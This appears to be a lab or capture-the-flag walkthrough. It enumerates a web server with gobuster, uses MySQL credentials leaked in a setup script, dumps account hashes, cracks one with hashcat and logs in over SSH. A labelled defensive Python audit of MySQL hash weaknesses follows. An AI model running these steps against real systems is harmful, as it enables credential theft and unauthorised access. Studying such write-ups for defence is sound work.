Host .110: ports 21, 22, 80, 3306, 8080

gobuster identifies a /scripts folder on the server:

└─$ gobuster dir -u http://192.168.xx.110/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.xx.110/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/09/10 10:06:37 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/blog                 (Status: 301) [Size: 315] [--> http://192.168.xx.110/blog/]
/images               (Status: 301) [Size: 317] [--> http://192.168.xx.110/images/]
/index.html           (Status: 200) [Size: 68778]
/scripts              (Status: 301) [Size: 318] [--> http://192.168.xx.110/scripts/]
/server-status        (Status: 403) [Size: 279]

Browsing here, we identify a /scripts/xx folder:

In this folder we find a file named wiki_setup.sh (found in 192.168.xx.110/scripts). It contains credentials for the MySQL user chanel, which we use to connect to the database:

mysql -u chanel -h 192.168.xx.110 -p
MySQL [mysql]> select * from user;

(45 columns. In every row the ssl_type, ssl_cipher, x509_issuer and x509_subject columns are empty, max_questions, max_updates, max_connections and max_user_connections are 0, password_expired is N and password_lifetime is NULL. Only the columns that differ between rows are shown below.)

+-----------+---------------+-----------------------------+-----------------------+-------------------------------------------+-----------------------+----------------+
| Host      | User          | privilege columns           | plugin                | authentication_string                     | password_last_changed | account_locked |
+-----------+---------------+-----------------------------+-----------------------+-------------------------------------------+-----------------------+----------------+
| localhost | root          | all Y                       | mysql_native_password | *0880FD3A9C8D2BB55A2C5C0BE9E0578EB55022B2 | 2022-06-22 09:47:01   | N              |
| localhost | mysql.session | Super_priv Y, all others N  | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | 2022-06-22 09:46:58   | Y              |
| localhost | mysql.sys     | all N                       | mysql_native_password | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | 2022-06-22 09:46:58   | Y              |
| localhost | chanel        | all N                       | mysql_native_password | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 | 2022-06-22 09:47:17   | N              |
| %         | chanel        | Select_priv Y, all others N | mysql_native_password | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 | 2022-06-22 09:47:17   | N              |
| localhost | cristine      | all N                       | mysql_native_password | *B12F09D11BB3852F8FA53FC7F017893DF01E3B82 | 2022-06-22 09:47:17   | N              |
| localhost | bob           | all N                       | mysql_native_password | *32520D64EA7094863697EC1BD3BE5FDC1496A1FF | 2022-06-22 09:47:17   | N              |
| localhost | shaun         | all N                       | mysql_native_password | *DC4EA813DD21ACDBC05CB657D64E410062FF561A | 2022-06-22 09:47:17   | N              |
+-----------+---------------+-----------------------------+-----------------------+-------------------------------------------+-----------------------+----------------+
8 rows in set (0.091 sec)
MySQL [mysql]>
MySQL [mysql]> select user,authenticationstring from user;
ERROR 1054 (42S22): Unknown column 'authenticationstring' in 'field list'
MySQL [mysql]> select user,authentication_string from user;
+---------------+-------------------------------------------+
| user          | authentication_string                     |
+---------------+-------------------------------------------+
| root          | *0880FD3A9C8D2BB55A2C5C0BE9E0578EB55022B2 |
| mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| chanel        | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 |
| chanel        | *407F8D35DAF8B6F7BC30BB665564CC36E8EA6FB3 |
| cristine      | *B12F09D11BB3852F8FA53FC7F017893DF01E3B82 |
| bob           | *32520D64EA7094863697EC1BD3BE5FDC1496A1FF |
| shaun         | *DC4EA813DD21ACDBC05CB657D64E410062FF561A |
+---------------+-------------------------------------------+
8 rows in set (0.090 sec)

Machine users:
root
chanel
cristine
bob
shaun

We can crack one of the passwords with hashcat, using mode 300 (MySQL 4.1/5+ hashes):

hashcat -m 300 -o cracked.txt -a 0 hashes /usr/share/wordlists/rockyou.txt

└─$ cat cracked.txt
b12f09d11bb3852f8fa53fc7f017893df01e3b82:2ql4sql

This is the hash for cristine, so we can now connect with ssh cristine@192.168.80.110
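A defender-side check on what this kind of dump exposes, added here as example code that is not part of the writeup: it parses the MySQL CLI's table output and flags accounts still on mysql_native_password (an unsalted SHA1(SHA1) hash, which is what hashcat mode 300 attacks), accounts with a wildcard '%' host, and hashes shared between different users. The sample rows, account names and passwords are constructed.

```python
import hashlib
import re
from collections import defaultdict

def mysql_native_password(pw: str) -> str:
    """Hash as stored by the mysql_native_password plugin (hashcat -m 300):
    '*' + upper-hex SHA1(SHA1(pw)). Unsalted, so equal passwords give equal hashes."""
    inner = hashlib.sha1(pw.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# One data row of `SELECT Host, User, plugin, authentication_string FROM mysql.user` as the CLI prints it; '+' border lines never match.
ROW_RE = re.compile(r"^\|\s*(?P<host>[^|]+?)\s*\|\s*(?P<user>[^|]+?)\s*\|\s*(?P<plugin>[^|]+?)\s*\|\s*(?P<auth>[^|]*?)\s*\|$")

def parse_user_table(text):
    """Turn the pipe-drawn CLI table into dicts, skipping borders and the header row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m["host"] != "Host":
            rows.append(m.groupdict())
    return rows

def audit(rows):
    """One finding per weakness; reuse is detectable only because the hash is unsalted."""
    findings, users_by_hash = [], defaultdict(set)
    for r in rows:
        acct = f"{r['user']}@{r['host']}"
        if r["plugin"] == "mysql_native_password" and r["auth"]:
            findings.append(f"{acct}: unsalted mysql_native_password hash; migrate to caching_sha2_password")
            users_by_hash[r["auth"]].add(r["user"])
        if r["host"] == "%":
            findings.append(f"{acct}: accepts logins from any host; restrict Host or firewall 3306")
    for users in users_by_hash.values():
        if len(users) > 1:
            findings.append("password reuse across accounts: " + ", ".join(sorted(users)))
    return findings

# Constructed sample dump (not the writeup's data); its hashes come from the function above.
SAMPLE_DUMP = "\n".join([
    "+-----------+-------+-----------------------+-------------------------------------------+",
    "| Host      | User  | plugin                | authentication_string                     |",
    "+-----------+-------+-----------------------+-------------------------------------------+",
    "| localhost | root  | caching_sha2_password | (salted caching_sha2 hash, elided)        |",
    f"| localhost | alice | mysql_native_password | {mysql_native_password('Winter2022!')} |",
    f"| %         | alice | mysql_native_password | {mysql_native_password('Winter2022!')} |",
    f"| localhost | bob   | mysql_native_password | {mysql_native_password('Winter2022!')} |",
    f"| localhost | carol | mysql_native_password | {mysql_native_password('correct horse')} |",
    "+-----------+-------+-----------------------+-------------------------------------------+",
])
```

Run `audit(parse_user_table(SAMPLE_DUMP))` against a real `mysql.user` export to get the findings list; the root row is left alone because caching_sha2_password is salted.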